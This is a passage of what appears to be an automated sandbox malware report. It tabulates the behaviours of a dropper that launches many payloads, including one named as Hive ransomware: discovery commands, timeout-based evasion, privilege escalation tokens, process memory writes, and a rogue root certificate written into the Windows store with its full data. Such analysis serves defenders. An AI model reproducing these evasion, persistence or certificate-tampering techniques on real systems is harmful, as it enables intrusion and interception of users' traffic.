Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\snails\ectosphere.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\4434.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\ama.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2910514938.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\clip.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\popapoers.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\award.pdf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\builder.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\kohjaekdfth.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\pp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\14082024.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Video Minimizer 1.77\videominimizer32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\gweadtrgh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\AutoUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\262965725.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\Hive%20Ransomware.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\sysnldcvmr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\Setup2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1989129625.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1989129625.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2M6HH.tmp\steel.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2M6HH.tmp\steel.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3161510603.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3161510603.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\random.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\random.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3161510603.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3161510603.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe N/A
N/A N/A C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe N/A
N/A N/A C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe N/A
N/A N/A C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe N/A
N/A N/A C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\ama.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\ama.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe N/A
N/A N/A C:\Windows\SysWOW64\fontdrvhost.exe N/A
N/A N/A C:\Windows\SysWOW64\fontdrvhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\fontdrvhost.exe N/A
N/A N/A C:\Windows\SysWOW64\fontdrvhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1989129625.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\Neverlose%20Loader.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\devtun\RuntimeBroker.exe N/A
N/A N/A C:\Windows\system32\devtun\RuntimeBroker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 228 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe
PID 228 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe
PID 2456 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2456 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2456 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe
PID 2456 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe
PID 228 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
PID 228 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
PID 4852 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe C:\Windows\SYSTEM32\schtasks.exe
PID 4852 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe C:\Windows\SYSTEM32\schtasks.exe
PID 228 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe
PID 228 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe
PID 228 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe
PID 228 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe
PID 228 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe
PID 228 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\award.pdf.exe
PID 228 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\award.pdf.exe
PID 228 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\award.pdf.exe
PID 4940 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe C:\Windows\SysWOW64\netsh.exe
PID 4940 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe C:\Windows\SysWOW64\netsh.exe
PID 4940 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe C:\Windows\SysWOW64\netsh.exe
PID 4312 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe C:\Windows\System32\certutil.exe
PID 4312 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe C:\Windows\System32\certutil.exe
PID 228 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\test14.exe
PID 228 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\test14.exe
PID 228 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
PID 228 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
PID 228 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\pp.exe
PID 228 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\pp.exe
PID 228 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\pp.exe
PID 228 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe
PID 228 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe
PID 3648 wrote to memory of 5236 N/A C:\Users\Admin\AppData\Local\Temp\Files\pp.exe C:\Users\Admin\AppData\Local\Temp\2910514938.exe
PID 3648 wrote to memory of 5236 N/A C:\Users\Admin\AppData\Local\Temp\Files\pp.exe C:\Users\Admin\AppData\Local\Temp\2910514938.exe
PID 3648 wrote to memory of 5236 N/A C:\Users\Admin\AppData\Local\Temp\Files\pp.exe C:\Users\Admin\AppData\Local\Temp\2910514938.exe
PID 2180 wrote to memory of 5188 N/A C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe C:\Windows\System32\schtasks.exe
PID 2180 wrote to memory of 5188 N/A C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe C:\Windows\System32\schtasks.exe
PID 5236 wrote to memory of 6056 N/A C:\Users\Admin\AppData\Local\Temp\2910514938.exe C:\Windows\sysnldcvmr.exe
PID 5236 wrote to memory of 6056 N/A C:\Users\Admin\AppData\Local\Temp\2910514938.exe C:\Windows\sysnldcvmr.exe
PID 5236 wrote to memory of 6056 N/A C:\Users\Admin\AppData\Local\Temp\2910514938.exe C:\Windows\sysnldcvmr.exe
PID 228 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe
PID 228 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe
